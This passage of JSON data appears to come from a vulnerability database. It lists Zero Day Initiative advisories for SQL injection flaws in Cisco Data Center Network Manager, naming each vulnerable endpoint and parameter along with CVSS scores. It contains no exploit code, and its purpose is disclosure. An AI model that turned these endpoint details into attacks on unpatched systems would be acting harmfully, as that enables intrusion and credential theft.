"obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-057", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-057/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:14", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getPortGroupStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getPortGroupStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-078", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-078/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:48", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of DELETE requests to the fm/fmrest/virtualportchannel/vpcwizard/history endpoint. When parsing the jobId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager deleteVpcHistory SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-020", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-020/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:54", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the getjobs endpoint. When parsing the filterStr parameter in the getRpmJobLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getRpmJobLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-112", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-112/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:29", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the getEndDeviceList endpoint of the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getEndDeviceList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-053", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-053/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:57", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the virtualportchannel endpoint. When parsing the filterStr parameter in the getVpcCount method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVpcCount SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-108", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-108/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:03", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/topology/switches/otv/feature service. When parsing the switch-id parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getDiscoveredDeviceCount switchIdList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-097", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-097/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:34", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/sanIslStat endpoint. When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanIslStatListESBySQL SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-045", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-045/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:07", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getEndDeviceStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getEndDeviceStatListWithVsan SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-091", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-091/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:47", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/virtualportchannel/vpcwizard/history endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVpcHistory SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-022", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-022/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:17", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getGigEStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanGigEStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-074", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-074/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:47", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/virtualportchannel/domain endpoint. When parsing the filterStr parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager VirtualPortChannel getDomain SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-025", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-025/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:51", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/smartLicensing/persistUserInfo endpoint. When parsing the username parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager persistUserInfo SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-016", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-016/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:16", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getGigEStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanGigEStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-073", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-073/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter of the getAllAppGroups endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getAllGroups SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-056", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-056/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:33", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/npvlinks service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getNpvLinks SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-047", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-047/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:49", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the getSwitchsDataLength endpoint of the DbInventoryWS service. When parsing the colFilterStr parameter in the getLanSwitchDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanSwitchDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 